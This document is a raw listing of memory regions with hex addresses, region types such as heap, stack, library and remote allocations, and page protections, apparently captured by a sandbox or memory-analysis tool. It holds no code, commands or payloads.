trusted library allocation
page read and write
CFF000
heap
page read and write
83F0000
trusted library allocation
page execute and read and write
5D1E000
stack
page read and write
76F4000
heap
page read and write
C01000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
7780000
trusted library allocation
page execute and read and write
4BD5000
heap
page read and write
1ACB15E0000
heap
page read and write
F0E000
stack
page read and write
1A47E8AB000
heap
page read and write
4BC0000
heap
page read and write
1A47EC46000
heap
page read and write
76B0000
trusted library allocation
page read and write
27AE000
stack
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
2B60000
heap
page read and write
C01000
heap
page read and write
89F0000
direct allocation
page read and write
8450000
trusted library allocation
page read and write
610E000
stack
page read and write
488F000
stack
page read and write
963000
heap
page read and write
32B0000
heap
page readonly
C01000
heap
page read and write
75F8000
trusted library allocation
page read and write
75DB000
heap
page read and write
C01000
heap
page read and write
295E000
stack
page read and write
3054000
heap
page read and write
733E000
stack
page read and write
F522BFE000
stack
page read and write
469E000
direct allocation
page execute and read and write
86FD000
heap
page read and write
6110000
heap
page readonly
890000
unkown
page readonly
C01000
heap
page read and write
740C000
heap
page read and write
8270000
trusted library allocation
page execute and read and write
1A47E667000
heap
page read and write
4BF4000
heap
page read and write
304E000
stack
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
1A47E664000
heap
page read and write
C01000
heap
page read and write
21491C4F000
heap
page read and write
2537B890000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
53F0000
heap
page read and write
356D000
heap
page read and write
C01000
heap
page read and write
50C1000
heap
page read and write
357D000
heap
page read and write
21610000
heap
page read and write
3434000
heap
page read and write
7750000
heap
page read and write
4480000
heap
page read and write
4BD3000
heap
page read and write
CAC000
heap
page read and write
77C9000
trusted library allocation
page read and write
6ECE000
stack
page read and write
F50000
trusted library allocation
page read and write
2E5D000
stack
page read and write
59F9000
trusted library allocation
page read and write
48C0000
heap
page read and write
214ABD55000
heap
page read and write
43D0000
heap
page read and write
899000
heap
page read and write
4B1E000
stack
page read and write
1A47E675000
heap
page read and write
864C000
heap
page read and write
49AE000
stack
page read and write
43BE000
stack
page read and write
73E3000
heap
page read and write
48EB000
stack
page read and write
4BDC000
heap
page read and write
63C0000
direct allocation
page read and write
3450000
heap
page read and write
4BB8000
heap
page read and write
77D0000
trusted library allocation
page read and write
51C9000
heap
page read and write
684000
heap
page read and write
53C0000
trusted library allocation
page read and write
D34000
heap
page read and write
2B64000
heap
page read and write
C01000
heap
page read and write
21495826000
trusted library allocation
page read and write
1A47EC4E000
heap
page read and write
4BD5000
heap
page read and write
D2D000
heap
page read and write
7FF848FD1000
trusted library allocation
page read and write
8681000
heap
page read and write
9D45BFF000
stack
page read and write
3557000
heap
page read and write
8390000
heap
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
77C0000
trusted library allocation
page read and write
C01000
heap
page read and write
64FA000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
6FE0000
direct allocation
page read and write
75C9000
heap
page read and write
A90000
heap
page read and write
5A3B000
trusted library allocation
page read and write
779F000
heap
page read and write
2149412B000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
3544000
heap
page read and write
1A47E8AB000
heap
page read and write
4BED000
heap
page read and write
DC0000
trusted library allocation
page read and write
21960B90000
heap
page read and write
8890000
direct allocation
page read and write
2E00000
direct allocation
page read and write
630000
heap
page read and write
7780000
trusted library allocation
page read and write
74AE000
stack
page read and write
3581000
heap
page read and write
7260000
heap
page read and write
25379D35000
system
page execute and read and write
50EF4FF000
stack
page read and write
3054000
heap
page read and write
8648000
heap
page read and write
C01000
heap
page read and write
2D0E000
stack
page read and write
2E50000
remote allocation
page execute and read and write
22282000
direct allocation
page execute and read and write
2A82DFE000
stack
page read and write
21493B68000
trusted library allocation
page read and write
4BD5000
heap
page read and write
CB0000
unkown
page read and write
25379EF2000
heap
page read and write
3054000
heap
page read and write
28C0000
heap
page read and write
5012000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page execute and read and write
2149526A000
trusted library allocation
page read and write
49F8000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
7734000
heap
page read and write
C01000
heap
page read and write
1690000
unkown
page readonly
214ABD4D000
heap
page read and write
53C0000
trusted library allocation
page read and write
782D000
stack
page read and write
21EB9000
heap
page read and write
8F70000
direct allocation
page execute and read and write
CB0000
heap
page read and write
700000
heap
page read and write
64AF000
heap
page read and write
76CE000
stack
page read and write
8310000
trusted library allocation
page read and write
2840000
heap
page read and write
3054000
heap
page read and write
356A000
heap
page read and write
4BE1000
heap
page read and write
21491C4D000
heap
page read and write
1A47E8A8000
heap
page read and write
390B000
remote allocation
page execute and read and write
C01000
heap
page read and write
F4E000
stack
page read and write
438000
stack
page read and write
64F5000
heap
page read and write
34DB000
heap
page read and write
C40000
unkown
page readonly
6FDB000
stack
page read and write
2C8E000
stack
page read and write
521F000
trusted library allocation
page read and write
3434000
heap
page read and write
218DC000
stack
page read and write
FB0000
heap
page read and write
3054000
heap
page read and write
1360000
unkown
page read and write
A40000
heap
page read and write
34C6000
heap
page read and write
4CA8000
trusted library allocation
page read and write
4BBC000
heap
page read and write
7330000
heap
page read and write
C01000
heap
page read and write
4BDB000
heap
page read and write
4BF6000
heap
page read and write
4FFF000
trusted library allocation
page read and write
C01000
heap
page read and write
327B000
heap
page read and write
C01000
heap
page read and write
3050000
heap
page read and write
2213C000
stack
page read and write
EB5000
heap
page read and write
66C0000
direct allocation
page read and write
8570000
trusted library allocation
page read and write
5DF9000
trusted library allocation
page read and write
58BE000
heap
page read and write
880000
unkown
page readonly
6E1E000
stack
page read and write
227A0000
heap
page read and write
C0000
unkown
page readonly
FB0000
heap
page read and write
470F000
stack
page read and write
C70000
heap
page read and write
21491BC0000
heap
page read and write
25379EEF000
heap
page read and write
214ABC00000
heap
page read and write
21960000
direct allocation
page read and write
354C000
heap
page read and write
387E000
stack
page read and write
8580000
trusted library allocation
page read and write
3434000
heap
page read and write
482E000
stack
page read and write
C01000
heap
page read and write
5232000
heap
page read and write
38C5000
heap
page read and write
27A9000
stack
page read and write
21160000
direct allocation
page read and write
1A47E5F2000
heap
page read and write
3549000
heap
page read and write
214955EA000
trusted library allocation
page read and write
C40000
unkown
page readonly
7FF848E22000
trusted library allocation
page read and write
EC8000
trusted library allocation
page read and write
6504000
heap
page read and write
49C0000
trusted library allocation
page execute and read and write
7860000
trusted library allocation
page read and write
59A3000
heap
page read and write
8590000
trusted library allocation
page read and write
360E000
stack
page read and write
4BBC000
heap
page read and write
21EC0000
remote allocation
page read and write
90C000
stack
page read and write
C01000
heap
page read and write
63D5000
heap
page read and write
770E000
heap
page read and write
2AD0000
heap
page read and write
2A3C000
heap
page read and write
4500000
direct allocation
page execute and read and write
21493B75000
trusted library allocation
page read and write
22819000
heap
page read and write
C01000
heap
page read and write
66B0000
direct allocation
page read and write
2FF0000
unkown
page readonly
2F0B000
remote allocation
page execute and read and write
22556000
unclassified section
page execute and read and write
33D9000
heap
page read and write
21493866000
trusted library allocation
page read and write
1A47E670000
heap
page read and write
1300000
unkown
page read and write
C01000
heap
page read and write
780C000
stack
page read and write
C01000
heap
page read and write
22BB0000
heap
page read and write
21D30000
direct allocation
page read and write
58A3000
heap
page read and write
4BC6000
heap
page read and write
223DD000
unclassified section
page execute and read and write
2ACE000
stack
page read and write
7FF8490E0000
trusted library allocation
page read and write
3380000
heap
page read and write
333E000
stack
page read and write
A436BBA000
stack
page read and write
78B0000
trusted library allocation
page read and write
4852000
unclassified section
page read and write
7630000
trusted library allocation
page read and write
51A3000
trusted library allocation
page read and write
F30000
trusted library allocation
page read and write
71DE000
stack
page read and write
21495242000
trusted library allocation
page read and write
4BB1000
heap
page read and write
2E4F000
stack
page read and write
400000
system
page execute and read and write
33DB000
heap
page read and write
DE2000
trusted library allocation
page read and write
7403000
heap
page read and write
214ABBA7000
heap
page read and write
D5000
unkown
page read and write
C01000
heap
page read and write
4BD0000
heap
page read and write
870000
unkown
page readonly
2537B6F0000
trusted library allocation
page read and write
82C0000
heap
page read and write
3455000
heap
page read and write
3341000
heap
page read and write
A4371FF000
stack
page read and write
77A0000
trusted library allocation
page read and write
2A56000
heap
page read and write
72FF000
stack
page read and write
4FD0000
heap
page read and write
D7000
unkown
page readonly
2FF0000
heap
page read and write
4BC1000
heap
page read and write
2A82A7E000
stack
page read and write
3569000
heap
page read and write
1A47E662000
heap
page read and write
C01000
heap
page read and write
3434000
heap
page read and write
C01000
heap
page read and write
833E000
stack
page read and write
C01000
heap
page read and write
1690000
unkown
page readonly
4BD6000
heap
page read and write
22290000
unclassified section
page execute and read and write
12FC000
stack
page read and write
34C5000
heap
page read and write
21D8C000
heap
page read and write
6491000
heap
page read and write
6730000
direct allocation
page read and write
214A3641000
trusted library allocation
page read and write
4900000
heap
page readonly
357D000
heap
page read and write
354C000
heap
page read and write
FC0000
heap
page read and write
3AE0000
unkown
page execute and read and write
76FD000
heap
page read and write
82B0000
trusted library allocation
page read and write
31F0000
trusted library allocation
page read and write
C01000
heap
page read and write
75B0000
trusted library allocation
page read and write
214AC050000
heap
page read and write
63D0000
heap
page read and write
684000
heap
page read and write
C01000
heap
page read and write
1A47E8A0000
heap
page read and write
646C000
heap
page read and write
7020000
direct allocation
page read and write
214953F1000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
61E7000
heap
page read and write
214ABDAD000
heap
page read and write
4FE0000
trusted library allocation
page read and write
B93000
unkown
page read and write
DC9000
trusted library allocation
page read and write
C01000
heap
page read and write
2537BA00000
trusted library allocation
page read and write
4BEB000
heap
page read and write
847C000
stack
page read and write
4BBF000
heap
page read and write
473000
system
page execute and read and write
C01000
heap
page read and write
38C5000
heap
page read and write
1ACAF940000
heap
page read and write
5FCF000
stack
page read and write
2919000
heap
page read and write
1A47E8A9000
heap
page read and write
7830000
trusted library allocation
page read and write
139B000
heap
page read and write
2149583C000
trusted library allocation
page read and write
2A829FF000
stack
page read and write
4BB0000
heap
page read and write
4BF2000
heap
page read and write
2765000
heap
page read and write
1A47EC41000
heap
page read and write
7718000
heap
page read and write
7900000
trusted library allocation
page read and write
4530000
heap
page read and write
44F0000
trusted library allocation
page read and write
D60000
unkown
page read and write
4C32000
heap
page read and write
C01000
heap
page read and write
21960760000
heap
page read and write
948000
stack
page read and write
77E9000
heap
page read and write
1A47F357000
heap
page read and write
C01000
heap
page read and write
540D000
trusted library allocation
page read and write
C01000
heap
page read and write
6F40000
direct allocation
page read and write
3C0000
heap
page read and write
866E000
stack
page read and write
1A47F366000
heap
page read and write
CAE000
unkown
page read and write
6D9E000
stack
page read and write
EFF000
stack
page read and write
59E0000
heap
page read and write
4B40000
heap
page execute and read and write
3510000
heap
page read and write
357C000
heap
page read and write
7717000
trusted library allocation
page read and write
21F2A000
heap
page read and write
51CC000
trusted library allocation
page read and write
C60000
heap
page read and write
1A47E5CF000
heap
page read and write
589F000
stack
page read and write
C01000
heap
page read and write
4C12000
heap
page read and write
1A47F372000
heap
page read and write
893000
heap
page read and write
21A0D000
stack
page read and write
E7F000
stack
page read and write
89D0000
direct allocation
page read and write
76D000
stack
page read and write
21491A30000
heap
page read and write
7EF80000
trusted library allocation
page execute and read and write
21495468000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
214940E6000
trusted library allocation
page read and write
6DDE000
stack
page read and write
2990000
heap
page read and write
6500000
heap
page read and write
278D000
stack
page read and write
4BC0000
heap
page read and write
C01000
heap
page read and write
21D40000
direct allocation
page read and write
974000
heap
page read and write
5558000
trusted library allocation
page read and write
14B0000
heap
page read and write
21491CA7000
heap
page read and write
484A000
trusted library allocation
page execute and read and write
684000
heap
page read and write
C01000
heap
page read and write
7594000
heap
page read and write
53C0000
trusted library allocation
page read and write
D00000
trusted library allocation
page read and write
447C000
heap
page read and write
DB3000
trusted library allocation
page execute and read and write
5150000
trusted library allocation
page read and write
4BD4000
heap
page read and write
6F0F000
stack
page read and write
7FF848E24000
trusted library allocation
page read and write
4BD3000
heap
page read and write
25379EC0000
heap
page read and write
A4374FD000
stack
page read and write
4510000
heap
page read and write
650C000
heap
page read and write
3054000
heap
page read and write
4BEB000
heap
page read and write
7D5E000
stack
page read and write
4BEF000
heap
page read and write
2750000
heap
page read and write
2196081B000
heap
page read and write
4BD0000
heap
page read and write
7880000
trusted library allocation
page read and write
21EB5000
heap
page read and write
214ABB20000
heap
page read and write
2E4C000
unkown
page read and write
D5000
unkown
page read and write
1A47E5F5000
heap
page read and write
6740000
direct allocation
page read and write
72BE000
stack
page read and write
283D000
stack
page read and write
795C000
stack
page read and write
1A47F350000
heap
page read and write
7870000
trusted library allocation
page read and write
CE000
unkown
page readonly
2537BB01000
trusted library allocation
page read and write
6120000
direct allocation
page read and write
400000
system
page execute and read and write
8410000
trusted library allocation
page read and write
1378000
heap
page read and write
4BD0000
heap
page read and write
34DC000
heap
page read and write
4BC1000
heap
page read and write
34B1000
heap
page read and write
3054000
heap
page read and write
6750000
heap
page read and write
21A8F000
stack
page read and write
873F000
heap
page read and write
2AB0000
heap
page read and write
2A54000
heap
page read and write
517A000
trusted library allocation
page read and write
21491BEC000
heap
page read and write
4BB1000
heap
page read and write
1A21000
unkown
page readonly
C01000
heap
page read and write
7DC5000
heap
page read and write
FA0000
unkown
page readonly
C01000
heap
page read and write
C01000
heap
page read and write
525A000
trusted library allocation
page read and write
1ACAFCD5000
heap
page read and write
77AF000
stack
page read and write
13D1000
unkown
page readonly
4BDB000
heap
page read and write
1A47F191000
heap
page read and write
430B000
remote allocation
page execute and read and write
2537BA0F000
trusted library allocation
page read and write
2189F000
stack
page read and write
53C0000
trusted library allocation
page read and write
34C3000
heap
page read and write
22500000
unclassified section
page execute and read and write
F44000
trusted library allocation
page read and write
2CCF000
stack
page read and write
FA0000
unkown
page readonly
CD2000
heap
page read and write
64A5000
heap
page read and write
C01000
heap
page read and write
7450000
trusted library allocation
page read and write
4BC0000
heap
page read and write
496C000
stack
page read and write
A4375FE000
stack
page read and write
FC8000
system
page execute and read and write
C01000
heap
page read and write
CE0000
heap
page read and write
2E00000
direct allocation
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
4BD0000
heap
page read and write
211B0000
direct allocation
page read and write
2A10000
heap
page read and write
1378000
heap
page read and write
214934A0000
heap
page readonly
D78000
heap
page read and write
4BEB000
heap
page read and write
59A1000
trusted library allocation
page read and write
48BE000
stack
page read and write
F70000
trusted library allocation
page read and write
4BB1000
heap
page read and write
3800000
heap
page read and write
21E6D000
stack
page read and write
3055000
heap
page read and write
21BD0000
heap
page read and write
6208000
heap
page read and write
2ED0000
heap
page read and write
2E10000
heap
page read and write
4BBF000
heap
page read and write
21610000
direct allocation
page read and write
227A1000
heap
page read and write
4D0000
heap
page read and write
DE5000
trusted library allocation
page execute and read and write
2FF8000
heap
page read and write
2FC0000
heap
page read and write
21491C05000
heap
page read and write
C01000
heap
page read and write
492A000
stack
page read and write
7F240000
trusted library allocation
page execute and read and write
6204000
heap
page read and write
380D000
heap
page read and write
2B72000
unkown
page read and write
21960780000
heap
page read and write
73A0000
trusted library allocation
page read and write
4A6E000
stack
page read and write
1320000
unkown
page read and write
2A8287E000
stack
page read and write
824F000
stack
page read and write
7FF849100000
trusted library allocation
page read and write
EBE000
stack
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
CC1000
unkown
page readonly
5437000
trusted library allocation
page read and write
50A0000
trusted library allocation
page read and write
2E80000
heap
page read and write
4B27000
trusted library allocation
page read and write
8860000
direct allocation
page read and write
21493D40000
trusted library allocation
page read and write
C01000
heap
page read and write
31B8000
heap
page read and write
86E0000
heap
page read and write
9D0000
heap
page read and write
F80000
unkown
page readonly
770E000
stack
page read and write
21493641000
trusted library allocation
page read and write
1A47F393000
heap
page read and write
3550000
heap
page read and write
27CD000
stack
page read and write
31FE000
unkown
page read and write
74E000
unkown
page read and write
214ABC20000
heap
page read and write
38C0000
heap
page read and write
2DE0000
heap
page read and write
C01000
heap
page read and write
ED0000
unkown
page readonly
F4A000
stack
page read and write
4BEC000
heap
page read and write
2149560E000
trusted library allocation
page read and write
34E0000
heap
page read and write
4FD7000
trusted library allocation
page read and write
5315000
trusted library allocation
page read and write
7C5E000
stack
page read and write
211E0000
direct allocation
page read and write
CA0000
heap
page read and write
76C0000
trusted library allocation
page read and write
6213000
heap
page read and write
1ACAF998000
heap
page read and write
214936C6000
trusted library allocation
page read and write
7DB4000
heap
page read and write
3012000
heap
page read and write
438E000
stack
page read and write
228AB000
heap
page read and write
1A47E598000
heap
page read and write
8460000
trusted library allocation
page read and write
6D4E000
stack
page read and write
1A47E500000
heap
page read and write
758E000
heap
page read and write
4FEA000
heap
page read and write
C01000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
21B4C000
stack
page read and write
861B000
stack
page read and write
6491000
heap
page read and write
752E000
stack
page read and write
F5233FE000
stack
page read and write
21491BB5000
heap
page read and write
77B0000
trusted library allocation
page read and write
5233000
heap
page read and write
295E000
stack
page read and write
64FB000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
4852000
trusted library allocation
page read and write
D8F000
heap
page read and write
356C000
heap
page read and write
8560000
trusted library allocation
page execute and read and write
7FF849090000
trusted library allocation
page read and write
440C000
stack
page read and write
22692000
heap
page read and write
21960810000
heap
page read and write
21495257000
trusted library allocation
page read and write
895000
heap
page read and write
775C000
heap
page read and write
7FF848E23000
trusted library allocation
page execute and read and write
1A47E5EF000
heap
page read and write
7D9F000
stack
page read and write
77B4000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
5FF0000
heap
page read and write
876C000
stack
page read and write
315F000
stack
page read and write
39D42000
system
page read and write
4BB9000
heap
page read and write
7DC2000
heap
page read and write
2E7C000
stack
page read and write
D40000
unkown
page readonly
2FE0000
heap
page read and write
7413000
heap
page read and write
89E000
heap
page read and write
47E9000
stack
page read and write
95F000
heap
page read and write
4BD0000
heap
page read and write
772F000
heap
page read and write
33DE000
heap
page read and write
77C0000
trusted library allocation
page read and write
61F0000
heap
page read and write
1A47E8AE000
heap
page read and write
756D000
stack
page read and write
C01000
heap
page read and write
4BC1000
heap
page read and write
4BD0000
heap
page read and write
843E000
stack
page read and write
33D7000
heap
page read and write
7880000
trusted library allocation
page read and write
8197000
stack
page read and write
7910000
trusted library allocation
page read and write
8644000
heap
page read and write
4A95000
heap
page execute and read and write
4BF2000
heap
page read and write
1A47E686000
heap
page read and write
5732000
heap
page read and write
73C7000
heap
page read and write
C01000
heap
page read and write
3570000
heap
page read and write
4BF6000
heap
page read and write
2A30000
heap
page read and write
4A32000
trusted library allocation
page read and write
7DB7000
heap
page read and write
7DB0000
heap
page read and write
4870000
trusted library allocation
page read and write
2537BBBE000
trusted library allocation
page read and write
4CCE000
stack
page read and write
7FF848ED0000
trusted library allocation
page read and write
927A000
direct allocation
page execute and read and write
2E00000
heap
page read and write
1A47E65F000
heap
page read and write
2559000
stack
page read and write
4D0F000
stack
page read and write
7F330000
trusted library allocation
page execute and read and write
2E4C000
unkown
page read and write
21A8E000
stack
page read and write
2149410F000
trusted library allocation
page read and write
74A9000
heap
page read and write
7482000
heap
page read and write
21C7F000
stack
page read and write
C01000
heap
page read and write
214940BE000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
85EE000
stack
page read and write
214ABDC9000
heap
page read and write
3561000
heap
page read and write
6204000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
C01000
heap
page read and write
357D000
heap
page read and write
4840000
heap
page read and write
970000
heap
page read and write
6F50000
direct allocation
page read and write
33D9000
heap
page read and write
7040000
direct allocation
page read and write
21960B94000
heap
page read and write
2181E000
stack
page read and write
3579000
heap
page read and write
776E000
stack
page read and write
4CF3000
trusted library allocation
page read and write
3434000
heap
page read and write
5FF4000
heap
page read and write
A4372FE000
stack
page read and write
7FF848E30000
trusted library allocation
page read and write
2A20000
heap
page readonly
1A47E4D0000
heap
page read and write
6204000
heap
page read and write
74F1000
heap
page read and write
4BB1000
heap
page read and write
C01000
heap
page read and write
49FA000
remote allocation
page execute and read and write
88B0000
trusted library allocation
page execute and read and write
222E0000
direct allocation
page read and write
58A4000
heap
page read and write
2960000
heap
page read and write
22BA0000
heap
page read and write
D5000
unkown
page read and write
89B0000
direct allocation
page read and write
C01000
heap
page read and write
21491B50000
heap
page read and write
356A000
heap
page read and write
4D0B000
remote allocation
page execute and read and write
44D0000
heap
page read and write
C01000
heap
page read and write
90E0000
direct allocation
page execute and read and write
228AA000
heap
page read and write
4BE3000
heap
page read and write
29AE000
stack
page read and write
3054000
heap
page read and write
2C32000
unkown
page read and write
CE000
unkown
page readonly
F72000
trusted library allocation
page read and write
E4E000
stack
page read and write
2917000
heap
page read and write
7730000
trusted library allocation
page read and write
C1000
unkown
page execute read
59A0000
heap
page read and write
1A47E636000
heap
page read and write
776E000
heap
page read and write
4730000
heap
page read and write
620D000
heap
page read and write
D60000
unkown
page read and write
3578000
heap
page read and write
14B0000
heap
page read and write
D00000
heap
page read and write
4F1C000
stack
page read and write
F90000
unkown
page readonly
75A0000
trusted library allocation
page read and write
3563000
heap
page read and write
2185E000
stack
page read and write
4ADE000
stack
page read and write
8850000
direct allocation
page read and write
21491BCD000
heap
page read and write
26AB000
stack
page read and write
4BD1000
heap
page read and write
320E000
unkown
page read and write
3434000
heap
page read and write
4A2E000
stack
page read and write
620D000
heap
page read and write
4BC0000
heap
page read and write
3545000
heap
page read and write
F00000
heap
page read and write
6400000
direct allocation
page read and write
1A47ECA9000
heap
page read and write
FB0000
heap
page read and write
4BB9000
heap
page read and write
1A47EC46000
heap
page read and write
3563000
heap
page read and write
7600000
trusted library allocation
page read and write
3568000
heap
page read and write
2A50000
heap
page read and write
78E0000
trusted library allocation
page read and write
D7000
unkown
page readonly
2A825CF000
stack
page read and write
356A000
heap
page read and write
221BD000
stack
page read and write
764E000
stack
page read and write
D99000
heap
page read and write
295E000
unkown
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
5368000
trusted library allocation
page read and write
623C000
stack
page read and write
1A47E8A9000
heap
page read and write
49AE000
stack
page read and write
4BD3000
heap
page read and write
53E4000
trusted library allocation
page read and write
C60000
heap
page read and write
21BDC000
heap
page read and write
C01000
heap
page read and write
25379EDC000
heap
page read and write
22069000
direct allocation
page execute and read and write
CE000
unkown
page readonly
214940F3000
trusted library allocation
page read and write
C0A000
heap
page read and write
5500000
heap
page read and write
7270000
heap
page read and write
C01000
heap
page read and write
2990000
heap
page read and write
291D000
stack
page read and write
C50000
unkown
page readonly
7711000
heap
page read and write
4BD0000
heap
page read and write
2A8394E000
stack
page read and write
9C0000
heap
page read and write
4BE8000
heap
page read and write
54DC000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
5FFE000
stack
page read and write
C01000
heap
page read and write
6F60000
direct allocation
page read and write
29DF000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2A82EFF000
stack
page read and write
21493470000
trusted library allocation
page read and write
1A47EC46000
heap
page read and write
CD0000
unkown
page read and write
2149582A000
trusted library allocation
page read and write
486E000
stack
page read and write
1A47E658000
heap
page read and write
CA0000
heap
page read and write
38C6000
heap
page read and write
D7000
unkown
page readonly
C01000
heap
page read and write
1A47E686000
heap
page read and write
211F0000
direct allocation
page read and write
7790000
trusted library allocation
page read and write
6DD0000
heap
page execute and read and write
6D8E000
stack
page read and write
C01000
heap
page read and write
35EF000
stack
page read and write
7DBA000
heap
page read and write
C01000
heap
page read and write
8571000
heap
page read and write
650C000
heap
page read and write
2A82503000
stack
page read and write
4FD5000
heap
page read and write
227A1000
heap
page read and write
579F000
stack
page read and write
6FD000
stack
page read and write
34D3000
heap
page read and write
2C1F000
unkown
page read and write
620D000
heap
page read and write
D70000
heap
page read and write
4590000
heap
page read and write
7FF8491B0000
trusted library allocation
page read and write
21E2E000
stack
page read and write
3434000
heap
page read and write
59D1000
trusted library allocation
page read and write
211C0000
direct allocation
page read and write
21495606000
trusted library allocation
page read and write
21190000
direct allocation
page read and write
F80000
heap
page read and write
3054000
heap
page read and write
8607000
trusted library allocation
page read and write
1A47E5EF000
heap
page read and write
8FA000
stack
page read and write
C01000
heap
page read and write
838D000
stack
page read and write
D70000
heap
page read and write
4BD0000
heap
page read and write
7710000
trusted library allocation
page read and write
214A3947000
trusted library allocation
page read and write
4C15000
heap
page read and write
220BB000
stack
page read and write
F80000
unkown
page readonly
1370000
heap
page read and write
3578000
heap
page read and write
77A0000
trusted library allocation
page read and write
D40000
unkown
page readonly
34B0000
heap
page read and write
8530000
heap
page read and write
23A97000
unclassified section
page execute and read and write
4BF4000
heap
page read and write
3580000
heap
page read and write
353E000
heap
page read and write
8840000
trusted library allocation
page read and write
4830000
trusted library allocation
page execute and read and write
C01000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2FE0000
heap
page read and write
2D4F000
stack
page read and write
C01000
heap
page read and write
21CFF000
heap
page read and write
4BC7000
heap
page read and write
2C2F000
unkown
page read and write
2149584E000
trusted library allocation
page read and write
646D000
heap
page read and write
4BC6000
heap
page read and write
C01000
heap
page read and write
21494A34000
trusted library allocation
page read and write
620D000
heap
page read and write
59C9000
trusted library allocation
page read and write
C01000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
4F14000
unclassified section
page read and write
3580000
heap
page read and write
43CE000
stack
page read and write
772A000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
7697000
trusted library allocation
page read and write
2B64000
heap
page read and write
21491BB0000
heap
page read and write
D3F000
heap
page read and write
58A5000
heap
page read and write
1300000
unkown
page read and write
63E0000
direct allocation
page read and write
32FF000
unkown
page read and write
75F0000
heap
page execute and read and write
8300000
trusted library allocation
page execute and read and write
4BC0000
heap
page read and write
3434000
heap
page read and write
21D50000
direct allocation
page read and write
2F4F000
stack
page read and write
684000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
21491C10000
heap
page read and write
770D000
stack
page read and write
4BD3000
heap
page read and write
DF5000
heap
page read and write
3545000
heap
page read and write
5741000
heap
page read and write
8630000
heap
page read and write
3566000
heap
page read and write
496B000
stack
page read and write
7779000
heap
page read and write
C01000
heap
page read and write
25D0000
heap
page read and write
737E000
stack
page read and write
4FB8000
heap
page read and write
3552000
heap
page read and write
DB0000
trusted library allocation
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
7DBD000
heap
page read and write
4BC1000
heap
page read and write
5FF5000
heap
page read and write
2206D000
direct allocation
page execute and read and write
C01000
heap
page read and write
21493B79000
trusted library allocation
page read and write
27F0000
heap
page read and write
2F63000
heap
page read and write
333B000
stack
page read and write
4C83000
trusted library allocation
page read and write
3434000
heap
page read and write
48FE000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
C0000
unkown
page readonly
23B05000
unclassified section
page execute and read and write
F40000
trusted library allocation
page read and write
62F000
stack
page read and write
C01000
heap
page read and write
29C0000
heap
page read and write
21A4D000
stack
page read and write
53F1000
heap
page read and write
7740000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
21494C87000
trusted library allocation
page read and write
2537BA03000
trusted library allocation
page read and write
2F5D000
stack
page read and write
C01000
heap
page read and write
2E00000
direct allocation
page read and write
6FEA000
stack
page read and write
2BCE000
stack
page read and write
4BBF000
heap
page read and write
21F60000
heap
page read and write
50B1000
heap
page read and write
2220D000
direct allocation
page execute and read and write
6EAE000
stack
page read and write
4FCF000
trusted library allocation
page read and write
55D000
stack
page read and write
214ABD20000
heap
page read and write
64AF000
heap
page read and write
C01000
heap
page read and write
2A82BFE000
stack
page read and write
570B000
remote allocation
page execute and read and write
3FFA000
remote allocation
page execute and read and write
5233000
heap
page read and write
53CC000
heap
page read and write
8705000
heap
page read and write
4BBF000
heap
page read and write
3434000
heap
page read and write
F0C000
heap
page read and write
2207F000
stack
page read and write
4353000
heap
page read and write
2990000
heap
page read and write
C01000
heap
page read and write
21493490000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
EC0000
unkown
page readonly
357D000
heap
page read and write
2A60000
heap
page read and write
21180000
direct allocation
page read and write
1A47E657000
heap
page read and write
851E000
stack
page read and write
3562000
heap
page read and write
4BD8000
heap
page read and write
276C000
stack
page read and write
EE0000
unkown
page readonly
33D0000
heap
page read and write
774D000
heap
page read and write
721E000
stack
page read and write
C01000
heap
page read and write
4BD6000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
C01000
heap
page read and write
4BD6000
heap
page read and write
7467000
trusted library allocation
page read and write
C0000
unkown
page readonly
7795000
heap
page read and write
49F0000
heap
page read and write
EC0000
trusted library allocation
page read and write
C01000
heap
page read and write
1311000
unkown
page readonly
711E000
stack
page read and write
2DF0000
heap
page read and write
2537B6D0000
heap
page read and write
C01000
heap
page read and write
8A4000
heap
page read and write
4955000
unkown
page execute and read and write
8350000
trusted library allocation
page execute and read and write
C01000
heap
page read and write
3300000
heap
page read and write
764A000
heap
page read and write
6180000
heap
page read and write
7DF499E20000
trusted library allocation
page execute and read and write
1040000
unkown
page readonly
8990000
trusted library allocation
page read and write
21960B95000
heap
page read and write
2A52000
heap
page read and write
59D1000
heap
page read and write
3014000
heap
page read and write
4BD0000
heap
page read and write
557F000
stack
page read and write
3234000
unkown
page read and write
33DA000
heap
page read and write
6EF0000
direct allocation
page read and write
1A47F381000
heap
page read and write
680000
heap
page read and write
356D000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
4E28000
trusted library allocation
page read and write
364E000
stack
page read and write
456000
system
page execute and read and write
8360000
heap
page read and write
C01000
heap
page read and write
1A47EE00000
heap
page read and write
490E000
stack
page read and write
53C0000
trusted library allocation
